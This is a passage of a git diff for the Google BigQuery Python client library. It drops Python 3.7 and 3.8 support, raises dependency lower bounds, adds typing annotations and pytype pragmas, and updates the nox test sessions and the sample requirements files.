Union["ModelReference", str, None]): # semantics. The BigQuery API makes a distinction between an unset # value, a null value, and a default value (0 or ""), but the protocol # buffer classes do not. - self._properties = {} + self._properties: Dict[str, Any] = {} if isinstance(model_ref, str): model_ref = ModelReference.from_string(model_ref) diff --git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index 83cb6362d..7e079781d 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -16,7 +16,7 @@ """Define resources for the BigQuery Routines API.""" -from typing import Any, Dict, Optional +from typing import Any, Dict, Optional, Union import google.cloud._helpers # type: ignore from google.cloud.bigquery import _helpers @@ -216,7 +216,7 @@ def return_type(self, value: StandardSqlDataType): self._properties[self._PROPERTY_TO_API_FIELD["return_type"]] = resource @property - def return_table_type(self) -> Optional[StandardSqlTableType]: + def return_table_type(self) -> Union[StandardSqlTableType, Any, None]: """The return type of a Table Valued Function (TVF) routine. .. versionadded:: 2.22.0 @@ -518,17 +518,23 @@ def __init__(self): @property def project(self): """str: ID of the project containing the routine.""" - return self._properties["projectId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["projectId"] # pytype: disable=typed-dict-error @property def dataset_id(self): """str: ID of dataset containing the routine.""" - return self._properties["datasetId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["datasetId"] # pytype: disable=typed-dict-error @property def routine_id(self): """str: The routine ID.""" - return self._properties["routineId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["routineId"] # pytype: disable=typed-dict-error @property def path(self): diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 03cde830e..749b0a00e 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -232,8 +232,12 @@ def __init__( if max_length is not _DEFAULT_VALUE: self._properties["maxLength"] = max_length if policy_tags is not _DEFAULT_VALUE: + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 self._properties["policyTags"] = ( - policy_tags.to_api_repr() if policy_tags is not None else None + policy_tags.to_api_repr() # pytype: disable=attribute-error + if policy_tags is not None + else None ) if isinstance(range_element_type, str): self._properties["rangeElementType"] = {"type": range_element_type} diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index c70a0ebea..e7f3c9a36 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -137,6 +137,8 @@ def _reference_getter(table): return TableReference(dataset_ref, table.table_id) +# TODO: The typehinting for this needs work. Setting this pragma to temporarily +# manage a pytype issue that came up in another PR. See Issue: #2132 def _view_use_legacy_sql_getter(table): """bool: Specifies whether to execute the view with Legacy or Standard SQL. @@ -148,10 +150,11 @@ def _view_use_legacy_sql_getter(table): Raises: ValueError: For invalid value types. """ - view = table._properties.get("view") + + view = table._properties.get("view") # type: ignore if view is not None: # The server-side default for useLegacySql is True. - return view.get("useLegacySql", True) + return view.get("useLegacySql", True) # type: ignore # In some cases, such as in a table list no view object is present, but the # resource still represents a view. Use the type as a fallback. if table.table_type == "VIEW": @@ -375,7 +378,7 @@ class Table(_TableBase): :meth:`~google.cloud.bigquery.schema.SchemaField.from_api_repr`. """ - _PROPERTY_TO_API_FIELD = { + _PROPERTY_TO_API_FIELD: Dict[str, Any] = { **_TableBase._PROPERTY_TO_API_FIELD, "clustering_fields": "clustering", "created": "creationTime", @@ -418,7 +421,10 @@ class Table(_TableBase): def __init__(self, table_ref, schema=None) -> None: table_ref = _table_arg_to_table_ref(table_ref) - self._properties = {"tableReference": table_ref.to_api_repr(), "labels": {}} + self._properties: Dict[str, Any] = { + "tableReference": table_ref.to_api_repr(), + "labels": {}, + } # Let the @property do validation. if schema is not None: self.schema = schema diff --git a/noxfile.py b/noxfile.py index 87bd9a70c..f069f8d37 100644 --- a/noxfile.py +++ b/noxfile.py @@ -24,7 +24,7 @@ MYPY_VERSION = "mypy==1.6.1" -PYTYPE_VERSION = "pytype==2021.4.9" +PYTYPE_VERSION = "pytype==2024.9.13" BLACK_VERSION = "black==23.7.0" BLACK_PATHS = ( "benchmark", @@ -37,9 +37,9 @@ "setup.py", ) -DEFAULT_PYTHON_VERSION = "3.8" -SYSTEM_TEST_PYTHON_VERSIONS = ["3.8", "3.11", "3.12"] -UNIT_TEST_PYTHON_VERSIONS = ["3.7", "3.8", "3.12"] +DEFAULT_PYTHON_VERSION = "3.9" +SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() @@ -102,10 +102,16 @@ def default(session, install_extras=True): "-c", constraints_path, ) - - if install_extras and session.python in ["3.11", "3.12"]: - install_target = ".[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" - elif install_extras: + # We have logic in the magics.py file that checks for whether 'bigquery_magics' + # is imported OR not. If yes, we use a context object from that library. + # If no, we use our own context object from magics.py. In order to exercise + # that logic (and the associated tests) we avoid installing the [ipython] extra + # which has a downstream effect of then avoiding installing bigquery_magics. + if install_extras and session.python == UNIT_TEST_PYTHON_VERSIONS[0]: + install_target = ( + ".[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" + ) + elif install_extras: # run against all other UNIT_TEST_PYTHON_VERSIONS install_target = ".[all]" else: install_target = "." @@ -157,7 +163,7 @@ def unit_noextras(session): # so that it continues to be an optional dependency. # https://github.com/googleapis/python-bigquery/issues/1877 if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - session.install("pyarrow==1.0.0") + session.install("pyarrow==4.0.0") default(session, install_extras=False) @@ -178,6 +184,7 @@ def mypy(session): "types-requests", "types-setuptools", ) + session.run("python", "-m", "pip", "freeze") session.run("mypy", "-p", "google", "--show-traceback") @@ -192,6 +199,7 @@ def pytype(session): session.install("attrs==20.3.0") session.install("-e", ".[all]") session.install(PYTYPE_VERSION) + session.run("python", "-m", "pip", "freeze") # See https://github.com/google/pytype/issues/464 session.run("pytype", "-P", ".", "google/cloud/bigquery") @@ -281,7 +289,7 @@ def mypy_samples(session): "types-setuptools", ) - session.install("typing-extensions") # for TypedDict in pre-3.8 Python versions + session.run("python", "-m", "pip", "freeze") session.run( "mypy", @@ -307,10 +315,13 @@ def snippets(session): session.install("grpcio", "-c", constraints_path) if session.python in ["3.11", "3.12"]: - extras = "[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" + extras = ( + "[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" + ) else: extras = "[all]" session.install("-e", f".{extras}", "-c", constraints_path) + session.run("python", "-m", "pip", "freeze") # Run py.test against the snippets tests. # Skip tests in samples/snippets, as those are run in a different session @@ -339,6 +350,7 @@ def cover(session): """ session.install("coverage", "pytest-cov") + session.run("python", "-m", "pip", "freeze") session.run("coverage", "report", "--show-missing", "--fail-under=100") session.run("coverage", "erase") @@ -378,6 +390,7 @@ def prerelease_deps(session): "google-cloud-bigquery-storage", "google-cloud-core", "google-resumable-media", + "db-dtypes", # Exclude version 1.49.0rc1 which has a known issue. See https://github.com/grpc/grpc/pull/30642 "grpcio!=1.49.0rc1", ) @@ -417,9 +430,6 @@ def prerelease_deps(session): session.install("--no-deps", "-e", ".[all]") # Print out prerelease package versions. - session.run("python", "-c", "import grpc; print(grpc.__version__)") - session.run("python", "-c", "import pandas; print(pandas.__version__)") - session.run("python", "-c", "import pyarrow; print(pyarrow.__version__)") session.run("python", "-m", "pip", "freeze") # Run all tests, except a few samples tests which require extra dependencies. @@ -453,6 +463,7 @@ def lint(session): session.install("flake8", BLACK_VERSION) session.install("-e", ".") + session.run("python", "-m", "pip", "freeze") session.run("flake8", os.path.join("google", "cloud", "bigquery")) session.run("flake8", "tests") session.run("flake8", os.path.join("docs", "samples")) @@ -467,6 +478,7 @@ def lint_setup_py(session): """Verify that setup.py is valid (including RST check).""" session.install("docutils", "Pygments") + session.run("python", "-m", "pip", "freeze") session.run("python", "setup.py", "check", "--restructuredtext", "--strict") @@ -478,6 +490,7 @@ def blacken(session): """ session.install(BLACK_VERSION) + session.run("python", "-m", "pip", "freeze") session.run("black", *BLACK_PATHS) @@ -504,6 +517,7 @@ def docs(session): session.install("-e", ".[all]") shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) + session.run("python", "-m", "pip", "freeze") session.run( "sphinx-build", "-W", # warnings as errors @@ -540,6 +554,7 @@ def docfx(session): ) shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) + session.run("python", "-m", "pip", "freeze") session.run( "sphinx-build", "-T", # show full traceback on exception diff --git a/owlbot.py b/owlbot.py index 07805d11a..c8efaa98d 100644 --- a/owlbot.py +++ b/owlbot.py @@ -14,7 +14,6 @@ """This script is used to synthesize generated parts of this library.""" from pathlib import Path -import textwrap import synthtool as s from synthtool import gcp @@ -70,13 +69,65 @@ # Include custom SNIPPETS_TESTS job for performance. # https://github.com/googleapis/python-bigquery/issues/191 ".kokoro/presubmit/presubmit.cfg", + ".kokoro/presubmit/system-3.8.cfg", ".kokoro/continuous/prerelease-deps.cfg", + ".kokoro/samples/python3.7/**", + ".kokoro/samples/python3.8/**", ".github/workflows", # exclude gh actions as credentials are needed for tests - "README.rst", + "README.rst", ], ) python.configure_previous_major_version_branches() + +s.replace( + ".kokoro/test-samples-impl.sh", + """# `virtualenv==20.26.6` is added for Python 3.7 compatibility +python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", + "python3.9 -m pip install --upgrade --quiet nox virtualenv", +) +s.replace( + "CONTRIBUTING.rst", + "3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", + "3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", +) +s.replace( + "CONTRIBUTING.rst", + r" \$ nox -s system-3.8 -- -k ", + r" $ nox -s system-3.9 -- -k ", +) +s.replace( + "CONTRIBUTING.rst", + r"""System tests are only configured to run under Python 3.8. + For expediency, we do not run them in older versions of Python 3.""", + r"System tests are configured to run under Python 3.9, 3.11, 3.12.", +) +s.replace( + "CONTRIBUTING.rst", + r"\$ nox -s py-3.8", + r"$ nox -s py-3.9", +) +s.replace( + "CONTRIBUTING.rst", + r"""- `Python 3.7`_ +- `Python 3.8`_ +""", + r"", +) +s.replace( + "CONTRIBUTING.rst", + r""".. _Python 3.7: https://docs.python.org/3.7/ +.. _Python 3.8: https://docs.python.org/3.8/ +""", + r"", +) +s.replace( + "scripts/readme-gen/templates/install_deps.tmpl.rst", + r"Samples are compatible with Python 3.7", + r"Samples are compatible with Python 3.9", +) + + # ---------------------------------------------------------------------------- # Samples templates # ---------------------------------------------------------------------------- @@ -93,6 +144,17 @@ r"exclude_patterns = \[", '\\g<0>\n "google/cloud/bigquery_v2/**", # Legacy proto-based types.', ) +s.replace( + "samples/**/noxfile.py", + 'BLACK_VERSION = "black==22.3.0"', + 'BLACK_VERSION = "black==23.7.0"', +) +s.replace( + "samples/**/noxfile.py", + r'ALL_VERSIONS = \["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"\]', + 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', +) + # ---------------------------------------------------------------------------- # pytype-related changes diff --git a/pyproject.toml b/pyproject.toml index c4e5c2f0d..8822fc57d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -20,7 +20,7 @@ build-backend = "setuptools.build_meta" name = "google-cloud-bigquery" authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] license = { text = "Apache 2.0" } -requires-python = ">=3.7" +requires-python = ">=3.9" description = "Google BigQuery API client library" readme = "README.rst" classifiers = [ @@ -33,8 +33,6 @@ classifiers = [ "License :: OSI Approved :: Apache Software License", "Programming Language :: Python", "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.7", - "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", @@ -47,8 +45,8 @@ dependencies = [ "google-auth >= 2.14.1, < 3.0.0dev", "google-cloud-core >= 2.4.1, < 3.0.0dev", "google-resumable-media >= 2.0.0, < 3.0dev", - "packaging >= 20.0.0", - "python-dateutil >= 2.7.3, < 3.0dev", + "packaging >= 24.2.0", + "python-dateutil >= 2.8.2, < 3.0dev", "requests >= 2.21.0, < 3.0.0dev", ] dynamic = ["version"] @@ -61,7 +59,7 @@ Repository = "https://github.com/googleapis/python-bigquery" # moved back to optional due to bloat. See # https://github.com/googleapis/python-bigquery/issues/1196 for more background. bqstorage = [ - "google-cloud-bigquery-storage >= 2.6.0, < 3.0.0dev", + "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0dev", # Due to an issue in pip's dependency resolver, the `grpc` extra is not # installed, even though `google-cloud-bigquery-storage` specifies it # as `google-api-core[grpc]`. We thus need to explicitly specify it here. @@ -70,20 +68,19 @@ bqstorage = [ # https://github.com/grpc/grpc/pull/15254 "grpcio >= 1.47.0, < 2.0dev", "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", - "pyarrow >= 3.0.0", + "pyarrow >= 4.0.0", ] pandas = [ - "pandas >= 1.1.0", + "pandas >= 1.1.4", "pandas-gbq >= 0.26.1; python_version >= '3.8'", "grpcio >= 1.47.0, < 2.0dev", "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", "pyarrow >= 3.0.0", - "db-dtypes >= 0.3.0, < 2.0.0dev", - "importlib_metadata >= 1.0.0; python_version < '3.8'", + "db-dtypes >= 1.0.4, < 2.0.0dev", ] -ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] +ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] -ipython = ["bigquery-magics >= 0.1.0"] +ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] opentelemetry = [ "opentelemetry-api >= 1.1.0", diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/desktopapp/user_credentials_test.py b/samples/desktopapp/user_credentials_test.py index 252b843c4..d14798d9b 100644 --- a/samples/desktopapp/user_credentials_test.py +++ b/samples/desktopapp/user_credentials_test.py @@ -13,7 +13,6 @@ # limitations under the License. import os -import sys from typing import Iterator, Union from unittest import mock @@ -24,13 +23,7 @@ PROJECT = os.environ["GOOGLE_CLOUD_PROJECT"] - -if sys.version_info >= (3, 8): - # Python 3.8+ has an AsyncMock attribute in unittest.mock, but 3.7 does not - MockType = Union[mock.MagicMock, mock.AsyncMock] -else: - # Other definitions and imports - MockType = Union[mock.MagicMock] +MockType = Union[mock.MagicMock, mock.AsyncMock] @pytest.fixture diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index ef38acb4f..4ad1bd028 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,2 @@ -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 71579867f..0ad2154a4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,63 +1,41 @@ -attrs===24.2.0; python_version == '3.7' -attrs==24.3.0; python_version >= '3.8' +attrs==24.3.0 certifi==2024.12.14 -cffi===1.15.1; python_version == '3.7' -cffi==1.17.1; python_version >= '3.8' +cffi==1.17.1 charset-normalizer==3.4.1 click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 -dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.1 -Fiona===1.9.6; python_version == '3.7' -Fiona==1.10.1; python_version >= '3.8' +Fiona==1.10.1 geojson==3.2.0 -geopandas===0.10.2; python_version == '3.7' -geopandas===0.13.2; python_version == '3.8' -geopandas==1.0.1; python_version >= '3.9' +geopandas==1.0.1 google-api-core==2.24.0 google-auth==2.37.0 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 -google-crc32c===1.5.0; python_version < '3.9' -google-crc32c==1.6.0; python_version >= '3.9' +google-crc32c==1.6.0 google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 -grpcio===1.62.2; python_version == '3.7' -grpcio==1.69.0; python_version >= '3.8' +grpcio==1.69.0 idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 -packaging===24.0; python_version == '3.7' -packaging==24.2; python_version >= '3.8' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +packaging==24.2 +pandas==2.2.3 proto-plus==1.25.0 -pyarrow===12.0.1; python_version == '3.7' -pyarrow===17.0.0; python_version == '3.8' -pyarrow==18.1.0; python_version >= '3.9' -pyasn1===0.5.1; python_version == '3.7' -pyasn1==0.6.1; python_version >= '3.8' -pyasn1-modules===0.3.0; python_version == '3.7' -pyasn1-modules==0.4.1; python_version >= '3.8' -pycparser===2.21; python_version == '3.7' -pycparser==2.22; python_version >= '3.8' -pyparsing===3.1.4; python_version < '3.9' -pyparsing==3.2.1; python_version >= '3.9' +pyarrow==18.1.0 +pyasn1==0.6.1 +pyasn1-modules==0.4.1 +pycparser==2.22 +pyparsing==3.2.1 python-dateutil==2.9.0.post0 pytz==2024.2 -PyYAML===6.0.1; python_version == '3.7' -PyYAML==6.0.2; python_version >= '3.8' -requests==2.31.0; python_version == '3.7' -requests==2.32.3; python_version >= '3.8' +PyYAML==6.0.2 +requests==2.32.3 rsa==4.9 Shapely==2.0.6 six==1.17.0 -typing-extensions===4.7.1; python_version == '3.7' -typing-extensions==4.12.2; python_version >= '3.8' +typing-extensions==4.12.2 typing-inspect==0.9.0 -urllib3===1.26.18; python_version == '3.7' -urllib3===2.2.3; python_version == '3.8' -urllib3==2.3.0; python_version >= '3.9' +urllib3==2.3.0 diff --git a/samples/magics/conftest.py b/samples/magics/conftest.py index 55ea30f90..0943c535a 100644 --- a/samples/magics/conftest.py +++ b/samples/magics/conftest.py @@ -18,7 +18,7 @@ import pytest if typing.TYPE_CHECKING: - from IPython.core.interactiveshell import TerminalInteractiveShell + from IPython.terminal.interactiveshell import TerminalInteractiveShell interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell") tools = pytest.importorskip("IPython.testing.tools") @@ -40,5 +40,7 @@ def ipython_interactive( for the duration of the test scope. """ - with ipython.builtin_trap: + + trap = typing.cast(typing.ContextManager, ipython.builtin_trap) + with trap: yield ipython diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 87efa3dec..4b81fe0ad 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -2,9 +2,5 @@ bigquery_magics==0.5.0 db-dtypes==1.3.1 google.cloud.bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 -ipython===7.31.1; python_version == '3.7' -ipython===8.0.1; python_version == '3.8' -ipython===8.18.1; python_version >= '3.9' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +ipython===8.18.1 +pandas==2.2.3 diff --git a/samples/notebooks/jupyter_tutorial_test.py b/samples/notebooks/jupyter_tutorial_test.py index 2c2cf9390..1861a822f 100644 --- a/samples/notebooks/jupyter_tutorial_test.py +++ b/samples/notebooks/jupyter_tutorial_test.py @@ -45,7 +45,9 @@ def ipython_interactive( for the duration of the test scope. """ - with ipython.builtin_trap: + + trap = typing.cast(typing.ContextManager, ipython.builtin_trap) + with trap: yield ipython diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 77103a338..e92d084a4 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -2,13 +2,7 @@ bigquery-magics==0.5.0 db-dtypes==1.3.1 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 -ipython===7.31.1; python_version == '3.7' -ipython===8.0.1; python_version == '3.8' -ipython===8.18.1; python_version >= '3.9' -matplotlib===3.5.3; python_version == '3.7' -matplotlib===3.7.4; python_version == '3.8' +ipython==8.18.1 matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.0; python_version >= '3.10' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +pandas==2.2.3 diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 077e465cf..52ccc8ab2 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,4 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/scripts/readme-gen/templates/install_deps.tmpl.rst b/scripts/readme-gen/templates/install_deps.tmpl.rst index 6f069c6c8..f21db80c4 100644 --- a/scripts/readme-gen/templates/install_deps.tmpl.rst +++ b/scripts/readme-gen/templates/install_deps.tmpl.rst @@ -12,7 +12,7 @@ Install Dependencies .. _Python Development Environment Setup Guide: https://cloud.google.com/python/setup -#. Create a virtualenv. Samples are compatible with Python 3.7+. +#. Create a virtualenv. Samples are compatible with Python 3.9+. .. code-block:: bash diff --git a/testing/constraints-3.7.txt b/testing/constraints-3.7.txt deleted file mode 100644 index 55e63449f..000000000 --- a/testing/constraints-3.7.txt +++ /dev/null @@ -1,36 +0,0 @@ -# This constraints file is used to check that lower bounds -# are correct in setup.py -# List *all* library dependencies and extras in this file. -# Pin the version to the lower bound. -# -# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", -# Then this file should have foo==1.14.0 -bigquery-magics==0.1.0 -db-dtypes==0.3.0 -geopandas==0.9.0 -google-api-core==2.11.1 -google-auth==2.14.1 -google-cloud-bigquery-storage==2.24.0 -google-cloud-core==2.4.1 -google-cloud-testutils==1.4.0 -google-crc32c==1.5.0 -google-resumable-media==2.0.0 -googleapis-common-protos==1.62.0 -grpcio==1.47.0 -grpcio-status==1.47.0 -ipywidgets==7.7.1 -ipython==7.23.1 -ipykernel==6.0.0 -opentelemetry-api==1.1.0 -opentelemetry-instrumentation==0.20b0 -opentelemetry-sdk==1.1.0 -packaging==20.0.0 -pandas==1.1.0 -proto-plus==1.22.3 -protobuf==3.20.2 -pyarrow==3.0.0 -python-dateutil==2.7.3 -requests==2.21.0 -Shapely==1.8.4 -six==1.13.0 -tqdm==4.7.4 diff --git a/testing/constraints-3.8.txt b/testing/constraints-3.8.txt deleted file mode 100644 index 9883fb8cc..000000000 --- a/testing/constraints-3.8.txt +++ /dev/null @@ -1,11 +0,0 @@ -grpcio==1.47.0 -pandas==1.2.0 - -# This constraints file is used to check that lower bounds -# are correct in setup.py -# -# Pin the version to the lower bound. -# -# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", -# Then this file should have foo==1.14.0 -pandas-gbq==0.26.1 diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index d4c302867..63b5d8bf6 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -4,5 +4,29 @@ # # NOTE: Not comprehensive yet, will eventually be maintained semi-automatically by # the renovate bot. +bigquery-magics==0.6.0 +db-dtypes==1.0.4 +geopandas==0.9.0 +google-api-core==2.11.1 +google-auth==2.14.1 +google-cloud-bigquery-storage==2.18.0 +google-cloud-core==2.4.1 +google-resumable-media==2.0.0 grpcio==1.47.0 -pyarrow>=4.0.0 +grpcio==1.49.1; python_version >= '3.11' +ipywidgets==7.7.1 +ipython==7.23.1 +ipykernel==6.2.0 +opentelemetry-api==1.1.0 +opentelemetry-instrumentation==0.20b0 +opentelemetry-sdk==1.1.0 +packaging==24.2.0 +pandas==1.1.4 +pandas-gbq==0.26.1 +proto-plus==1.22.3 +protobuf==3.20.2 +pyarrow==4.0.0 